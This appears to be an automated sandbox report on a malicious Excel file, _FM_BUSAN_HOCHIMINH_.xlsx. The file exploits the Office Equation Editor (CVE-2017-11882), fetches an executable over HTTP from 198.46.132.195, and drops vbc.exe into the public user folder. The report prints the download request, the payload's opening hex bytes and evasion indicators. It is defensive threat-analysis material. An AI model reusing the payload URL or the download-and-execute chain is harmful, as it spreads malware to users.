Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name: _FM_BUSAN_HOCHIMINH_.xlsx
Analysis ID: 573118
MD5: 9d7bf0f2fbb81660c8b91c2a323fde4e
SHA1: 7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
SHA256: d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
Tags: VelvetSweatshopxlsx
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Drops PE files to the user root directory
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: _FM_BUSAN_HOCHIMINH_.xlsx Virustotal: Detection: 38% Perma Link
Source: _FM_BUSAN_HOCHIMINH_.xlsx ReversingLabs: Detection: 35%
Source: http://198.46.132.195/ProgramFile/.win32.exe Virustotal: Detection: 6% Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 66MB
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.46.132.195 198.46.132.195
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Feb 2022 08:11:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 27 Jan 2022 15:00:29 GMTETag: "10b990-5d69194428b49"Accept-Ranges: bytesContent-Length: 1096080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 be 3e 87 5d 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d8 08 00 00 a0 07 00 00 00 00 00 96 fe 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 11 00 00 04 00 00 8e 81 11 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 35 0b 00 b4 00 00 00 00 d0 0b 00 30 b0 04 00 00 00 00 00 00 00 00 00 00 7c 10 00 90 3d 00 00 00 90 10 00 1c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a9 09 00 5c 00 00 00 00 00 00 00 00 00 00 00 2c 3b 0b 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e d6 08 00 00 10 00 00 00 d8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 6c 02 00 00 f0 08 00 00 6e 02 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 4e 00 00 00 60 0b 00 00 0a 00 00 00 4a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 b0 0b 00 00 02 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 b4 00 00 00 00 c0 0b 00 00 02 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 30 b0 04 00 00 d0 0b 00 00 b2 04 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 90 10 00 00 72 00 00 00 0a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ProgramFile/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ocsp.thawte.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /ProgramFile/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive

System Summary

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Code function: 4_2_0140092D 4_2_0140092D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0141E13E 4_2_0141E13E
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A3DF6 4_2_013A3DF6
Source: C:\Users\Public\vbc.exe Code function: 4_2_014198F0 4_2_014198F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_01400880 4_2_01400880
Source: C:\Users\Public\vbc.exe Code function: 4_2_013E574E 4_2_013E574E
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A57BF 4_2_013A57BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_01405792 4_2_01405792
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A3606 4_2_013A3606
Source: C:\Users\Public\vbc.exe Code function: 4_2_01404E15 4_2_01404E15
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A46DE 4_2_013A46DE
Source: C:\Users\Public\vbc.exe Code function: 4_2_01405EB0 4_2_01405EB0
Source: C:\Users\Public\vbc.exe Code function: String function: 0140BDBF appears 61 times
Source: .win32[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe 736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: _FM_BUSAN_HOCHIMINH_.xlsx Virustotal: Detection: 38%
Source: _FM_BUSAN_HOCHIMINH_.xlsx ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFA55.tmp Jump to behavior
Source: classification engine Classification label: mal96.expl.winXLSX@4/20@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe Window detected: Number of UI elements: 21
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_014004C6 push ecx; ret 4_2_014004D9
Source: .win32[1].exe.2.dr Static PE information: section name: .00cfg
Source: vbc.exe.2.dr Static PE information: section name: .00cfg
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_014119B9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0140A9D6 mov eax, dword ptr fs:[00000030h] 4_2_0140A9D6
Source: C:\Users\Public\vbc.exe Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_014119B9
Source: C:\Users\Public\vbc.exe Code function: 4_2_013FFC48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_013FFC48
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_01400125 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_01400125
Source: C:\Users\Public\vbc.exe Code function: 4_2_0141C3A6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 4_2_0141C3A6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs